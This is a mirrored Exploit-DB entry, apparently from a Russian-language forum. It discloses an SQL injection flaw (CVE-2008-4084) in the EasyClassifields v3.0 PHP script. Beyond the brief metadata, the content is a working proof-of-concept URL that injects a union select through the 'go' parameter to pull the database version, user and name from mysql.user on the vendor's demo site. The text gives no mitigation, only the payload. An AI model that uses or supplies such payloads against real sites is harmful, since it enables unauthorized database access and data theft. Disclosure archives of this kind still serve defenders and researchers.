- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6342
- Проверка EDB
-
- Пройдено
- Автор
- E.WIZZ!
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-4084
- Дата публикации
- 2008-09-01
Код:
##############EasyClassifields v3.0 SQL Injection#######################
####By: e.wiZz!
####Info: Bosnian Idiot FTW!
####Site: infected.blogger.ba
####Greetz: Luigi,suN8Hclf,str0ke
In the wild...
##################################################################
###Script Site: http://myiosoft.com/?1.6.0.0
###Vulnerability:
http://www.inthewild.xxx/path/index.php?PageSection=x&page=browse&go=<sql>
PoC on demo site:
http://myiosoft.com/products/EasyClassifields/demo/staticpages/easyclassifields/index.php?PageSection=0&page=browse&go=-1%20union%20select%20all%20concat(0x3a,version(),0x3a,user(),0x3a,0x3a,database()),2%20from%20mysql.user
# milw0rm.com [2008-09-01]- Источник
- www.exploit-db.com
